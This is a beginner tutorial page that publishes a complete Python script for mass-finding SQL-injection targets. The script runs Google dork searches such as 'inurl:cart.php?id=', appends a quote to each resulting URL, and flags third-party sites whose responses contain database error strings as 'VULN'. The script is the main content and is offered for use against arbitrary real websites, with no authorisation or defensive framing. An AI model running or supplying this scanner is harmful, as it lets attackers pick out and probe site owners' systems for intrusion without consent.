Python to Exploit the Google Dork with Full Source Code For Beginners

This script will teach you how to auto find the vulnerability sites of SQL injection in the google search engine.

Prerequisites You only need Python to run this script. You can visit here to download Python. but you need to install the requirements package first!

Requirements:

  • google
  • requests

Run the Script:

python3 main.py
Code language: CSS (css)

Use of the Script:

kali@kali$ python3 main.py [?] dork: [inurl:cart.php?id=] [?] total page : 25 you will see the following results here
Code language: CSS (css)

Source Code:

main.py

import sys import re # the error contans for sql injection vulnerable errors = {'MySQL': 'error in your SQL syntax', 'MiscError': 'mysql_fetch', 'MiscError2': 'num_rows', 'Oracle': 'ORA-01756', 'JDBC_CFM': 'Error Executing Database Query', 'JDBC_CFM2': 'SQLServer JDBC Driver', 'MSSQL_OLEdb': 'Microsoft OLE DB Provider for SQL Server', 'MSSQL_Uqm': 'Unclosed quotation mark', 'MS-Access_ODBC': 'ODBC Microsoft Access Driver', 'MS-Access_JETdb': 'Microsoft JET Database', 'Error Occurred While Processing Request' : 'Error Occurred While Processing Request', 'Server Error' : 'Server Error', 'Microsoft OLE DB Provider for ODBC Drivers error' : 'Microsoft OLE DB Provider for ODBC Drivers error', 'Invalid Querystring' : 'Invalid Querystring', 'OLE DB Provider for ODBC' : 'OLE DB Provider for ODBC', 'VBScript Runtime' : 'VBScript Runtime', 'ADODB.Field' : 'ADODB.Field', 'BOF or EOF' : 'BOF or EOF', 'ADODB.Command' : 'ADODB.Command', 'JET Database' : 'JET Database', 'mysql_fetch_array()' : 'mysql_fetch_array()', 'Syntax error' : 'Syntax error', 'mysql_numrows()' : 'mysql_numrows()', 'GetArray()' : 'GetArray()', 'FetchRow()' : 'FetchRow()', 'Input string was not in a correct format' : 'Input string was not in a correct format', 'Not found' : 'Not found'} try: import requests import googlesearch # the function to exploit the google hacking databases def Exploit(dork,total_page): # this require google search engine user_agent = {"User-agent":"Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36"} Total_page = int(total_page) for b in googlesearch.search(dork, num=Total_page): web = b+"'" # add ' to end the result url. to check if website is vuln by SQL Injection # using requests r = requests.get(web, headers=user_agent) webs = r.text # return errors dictionary to find the error problem matches for Type, ErrorMessage in errors.items(): if re.search(ErrorMessage, webs): # append the list of vulnerability website to result print(" \033[41m\033[30mVULN\033[40m\033[37m {0}\n Vulnerability Type: \033[31m{1}".format(b,Type)) # doing the while input while True: # going to ask your dork dork = input("[?] dork: [inurl:cart.php?id=] ") total_page = input("[?] total page : ") # if you input the empty dork. this will set the default dork as 'inurl:products.php?id=' if not dork: Exploit(dork = "inurl:cart.php?id=", total_page = total_page) else: Exploit(dork = dork,total_page = total_page) except ImportError: # this error will display on your terminal if you havent # installed the google module print("[!] You havent installed the required modules!\n[+] to install that packages. run 'pip3 install -r requirements.txt' on your terminal\n") sys.exit() except KeyboardInterrupt: sys.exit()
Code language: PHP (php)

Leave a Comment